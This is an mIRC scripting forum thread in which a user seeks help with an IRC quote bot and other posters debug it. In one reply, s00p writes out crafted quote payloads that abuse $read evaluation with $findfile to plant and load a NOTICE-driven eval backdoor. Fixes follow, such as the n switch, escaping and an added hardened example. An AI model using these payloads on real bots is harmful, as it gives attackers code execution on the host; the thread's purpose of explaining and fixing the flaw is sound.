Joined: Jan 2007
Posts: 280
Fjord artisan
OP Offline
Hi, the following script below is a quote script which saves quotes, shows them at IRC and online on our network-website. I've just tried to add a "nickname-archive" (long story), but after that it won't msg the success anymore. It also doesn't write the added quote into the PHP File, but it does write the HTML Tags and it does write the nickname and fulldate.

The parts of "quote, lastquote and delquote" DO work, so they don't need to be fixed, or I don't need help with them. The problems are at the parts of "addquote" and "delquote".



Information about the files and aliases:
script (uploads via a loaded ftp script the targetfile)
quotewrite Needs to write quote into the .txt files and .php file
quotedel Needs to unwrite/remove the quote from the .txt files and .php file
quoteup Needs to upload the files via the script alias.
quotetest Needs to write nickname into txt file when nickname isn't in it yet


Script:
Code:
alias quotetest {
  if $nick !isin $read(C:\users\cvdeeden\desktop\DJ-Serv\archivenames.txt) {
    write C:\users\cvdeeden\desktop\DJ-Serv\archive.txt <b>+</b> <a href="/ $+ $nick $+ quotes.php"> $+ $nick $+ </a>
  }
}

alias quoteup {
  script C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\quotes.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\archivenames.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\archive.txt
}

alias quotewrite {
  write C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php <div class="frameheader"><h1>TOEGEVOEGD OP $fulldate $+ </h1></div><div class="text"><p> $+ $2- $+ </p></div> 
  write C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt <div class="frameheader"><h1>TOEGEVOEGD DOOR $nick $+ </h1></div><div class="text"><small>Toegevoegd op:<i class="quote"> $+ $fulldate $+ </i></small><p> $+ $2- $+ </p></div> 
  write C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt <div class="frameheader"><h1>TOEGEVOEGD DOOR $nick $+ </h1></div><div class="text"><small>Toegevoegd op:<i class="quote"> $+ $fulldate $+ </i></small><p> $+ $2- $+ </p></div>
}

alias quoteremove {
  write -dl $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt)) C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt
  write -dl $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php)) C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php
  write -dl $2 C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt
}

on *:TEXT:*:#:{
  if ($1 == .quote) {
    if ($2) {
      if ($2 isnum) {
        if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) != $null) { msg $chan QUOTE: Quote $chr(35) $+ $2 $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) }
        else { msg # QUOTE: Line doesn't exist }
      }
      else { msg # QUOTE: Please provide a number }
    }
    else {
      set %lines $rand(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt))
      msg $chan QUOTE $chr(35) $+ %lines $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,%lines)
    }
  }
  if ($1 == .addquote) {
    if ($address($nick,1) isin %Quote.ban) { msg # QUOTE: You are banned from adding quotes! }
    else {
      if ($2) {
        if ($chr(36) isin $2-) { msg # QUOTE: Invalid characters! }
        else {
          write C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt $2- $+ , added by $nick
          set %lines (1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt))
          inc %quotes 1
          quotewrite 
          quoteup
          quotetest
          msg # QUOTE: Added!
        }
      }
    }
  }  
  if ($1 == .delquote) {
    if ($nick == %Owner || $nick == %Owner2 || $nick == %Owner3) {
      if ($2) {
        if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) != $null) {
          write -dl $2 C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt
          quoteremove
          quoteup
          msg # QUOTE: Line deleted
          halt
        }
        else { msg # QUOTE: Line doesn't exist }
      }
    }
  }
  if ($1 == .searchquote) {
    if ($2) {
      if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,w,* $+ $2 $+ *) != $null) {
        msg # QUOTE: $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,w,* $+ $2 $+ *)
      }
      else { msg # QUOTE: No results found }
    }
  }
  if ($1 == .lastquote) {
    set %lines $lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt)
    msg # QUOTE $chr(35) $+ %lines $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,%lines)
  }
}

Last edited by DuXxXieJ; 12/11/09 04:09 PM.

Squee whenever a squee squee's. Squee whenever a squee does not squee.
Joined: Jan 2007
Posts: 1,156
D
Hoopy frood
Offline
set %lines (1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt))

Is this supposed to be using $+() ? If not, $lines won't be evaluated.

set %lines $+(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt))


You say /quotewrite, but in the quotewrite alias it is wanting to add $2-. Can you verify it is getting $2- and $nick from the text event?

Joined: Jul 2008
Posts: 236
S
Fjord artisan
Offline
DJ_Sol: I see instances of $rand(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt)) in that code, however I don't quite understand how that particular broken line of code, as stupid as it is, would cause any problems, or even why it is there in the first place! There is no further logic after that branch that relies on that value, so he'd best get rid of it!

Quote:
The parts of "quote, lastquote and delquote" DO work, so they don't need to be fixed, or I don't need help with them.

I disagree. Your quote+lastquote needs to be fixed. It's disgusting, and I would never run such a script on my own system, unless of course I wanted to be hacked. /help $read should yield more information, if you are so inclined as to read it. By the looks of things, you aren't, as the next error I noticed: Your alias quoteremove looks stupid... $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt)). Fix that, too... it is causing delquote to not work. Surprise, surprise!

It might be a good idea to stop misdiagnosing problems. Usually this is a problem in itself as it is misleading to those who will try to help you. This problem can be solved by reading non-stop until you understand the concepts of debugging, particularly that of providing what is known as a "minimal testcase" (google). When you say things like "I don't need help with them" and they're broken, it makes you look like an arrogant, counterproductive newb. You will listen to the advice, paste the results of your fixes or you will find some other group of people to be "better than".

Good day.

Last edited by s00p; 13/11/09 08:38 AM.
Joined: Jan 2007
Posts: 1,156
D
Hoopy frood
Offline
Lighten up soop, you don't need to put people down.

Joined: Feb 2004
Posts: 206
D
Fjord artisan
Offline
Soop: You have this fixation on $read being a huge security hole.

I scanned the above code and $read is either taking a string to be used as a comparator (i.e. not being used in a context where it is going to be evaluated) or output to the channel with a benign string prepended.

You also mention the "n" switch which prevents evaluation (i.e. calculation of any variables or identifiers)

Please explain, clearly and without belittling anyone, how this is a risk in this context. Or perhaps more or less of a risk if someone crafted a malicious quote. Worked examples would help to illustrate your explanation!

Cheers,

DK


Darwin_Koala

Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!
Joined: Jul 2008
Posts: 236
S
Fjord artisan
Offline
I have explained it clearly at least half a dozen times in the past. Try this code (from the input textbox):

/write -c C:\test.txt $version
//echo -- $read(C:\test.txt)
//echo -- $read(C:\test.txt,n)

See any difference between the 2 lines of output? See why it's a security risk in this case? I have 'this fixation on $read being a huge security hole' because in this case it's used in a way that is risky. I've asked a number of times that people read /help $read and still you haven't.

edit: I'm light. As lightened up as I could possibly be having wasted 15-20 minutes of time looking in depth at code that appears to have no problems only to find the code that has evaded my eyes by way of suggestion that it "works" has obvious errors. I didn't put him down, I just said his script is stupid.

Last edited by s00p; 13/11/09 11:10 PM.
Joined: Feb 2004
Posts: 206
D
Fjord artisan
Offline
Soop.

As a general note - you seem to be bent on putting either other people down ("obviously not reading the help file" etc) or ripping code to pieces ("Code is stupid") that you are forgetting to read and understand what is being said.

On the other hand, I clearly did not phrase my request clearly enough - otherwise you might have actually answered it instead of trotting out your (now regular) generalities.

In context:
- let us assume that the quote is "$version".
- Quote File = C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt (just saves on typing)
- "$version, added by Darwin_Koala" is added to quote file.
- "6.35, added by Darwin_Koala" is read from quote file.
- "6.35, added by Darwin_Koala" is compared with null (using "!=")
- "QUOTE #<n>: 6.35, added by Darwin_Koala" is messaged to the channel.

Again, I ask - where is the risk in the above? That is my original question - you obviously have some concept that I wish to understand.

Thanks,

DK


Darwin_Koala

Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!
Joined: Jul 2008
Posts: 236
S
Fjord artisan
Offline
You're right. There's no security risk with $version. Now let's assume the quote is $findfile($mircdir,*.*,1,1,write C:\script.mrc ON 1:NOTICE:eval *:*: $!2-)

ON 1:NOTICE:eval *:*: $!2- is then written to C:\script.mrc after the quote is $read'd. Now let's assume the malicious quoter (l33tHaqSaw) uses another specially crafted quote: $findfile($mircdir,*.*,1,1,load -rs C:\script.mrc)

Leet hacksaw can now send notices to the bot in the form of: eval ... and these will be evaluated as code in a similar manner, eg: eval write C:\test.mrc ...

Last edited by s00p; 14/11/09 05:57 AM.
Joined: Feb 2004
Posts: 206
D
Fjord artisan
Offline
What is read is
"$findfile($mircdir,*.*,1,1,write C:\script.mrc ON 1:NOTICE:eval *:*: $!2-), added by l33tHaqSaw".

I haven't tried this, but I assume (erring on the side of caution) that this will have the same effect.

While the "n" switch in $read is one solution, another may be to parse the quotes before writing to file to remove suspect identifiers. This latter approach would allow non-suspect identifiers (e.g. $date, $time, $nick etc) to be used in the quotes file. I had thought of prepending the quote with a benign character - but that may not work (quoter could just put another word and a space in front of $findfile).

Thank you for the clearer explanation. These nuances are not explained in the help file and the clear explanation of the dangers (no matter how often repeated) is useful for many of the novice readers.

Cheers,

DK


Darwin_Koala

Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!
Joined: Jul 2008
Posts: 236
S
Fjord artisan
Offline
Aside from using the n switch, you could replace whitespace/newline followed by $ with $! when saving, and whitespace/newline % with % $+... Other option is using $encode or some other method before saving it...

The help file does explain that the line read using $read/$readini will not be evaluated when using the n switch. Perhaps this isn't as clear as a warning in red saying "this function can lead to security compromisation if not used correctly", but it's there nonetheless.

The effect is that the line is evaluated, thus $version evaluates to 6.35 and $findfile($mircdir,*.*,1,1,write C:\script.mrc ON 1:NOTICE:eval *:*: $!2-) evaluates to the filename it found, and also executes this command (assuming there is a file within the directory $mircdir): write C:\script.mrc ON 1:NOTICE:eval *:*: $!2-

The second one loads the script file, thus giving the attacker an interactive mIRC shell if you like, allowing them the same access that mIRC has to the entire system. It's not that difficult to prevent. Just use $read(%file,n) or $read(%file,n,%line) when reading files.
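
The read-side fix recommended in this thread, applied to the .quote, .searchquote and .lastquote handlers. This is an added example, not code from any poster; the local alias qfile and the empty-file and range checks are assumptions introduced here.

```mirc
; Added example, not from the thread: quote handlers that never evaluate stored text.
; qfile is a hypothetical local alias; the path is the one used in the thread.
alias -l qfile { return C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt }

on *:TEXT:*:#:{
  var %total = $lines($qfile)
  if ($1 == .quote) {
    if (%total == 0) { msg # QUOTE: No quotes stored | return }
    if ($2 == $null) { var %n = $rand(1,%total) }
    elseif ($2 isnum $+(1-,%total)) { var %n = $int($2) }
    else { msg # QUOTE: Please provide a number between 1 and %total | return }
    ; n = return the stored line as plain text, identifiers and variables are not evaluated
    ; t = treat line 1 as a quote even if it is a number (otherwise it is taken as a line count)
    msg # QUOTE $chr(35) $+ %n $+ : $read($qfile,nt,%n)
  }
  elseif (($1 == .searchquote) && ($2 != $null)) {
    ; w = wildcard search; $readn holds the number of the matching line afterwards
    var %hit = $read($qfile,ntw,$+(*,$2-,*))
    if (%hit != $null) { msg # QUOTE $chr(35) $+ $readn $+ : %hit }
    else { msg # QUOTE: No results found }
  }
  elseif ($1 == .lastquote) {
    if (%total == 0) { msg # QUOTE: No quotes stored | return }
    msg # QUOTE $chr(35) $+ %total $+ : $read($qfile,nt,%total)
  }
}
```

The n switch only protects the read itself: passing the returned text to something that evaluates its arguments again (a /timer command, for example) brings the problem back.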

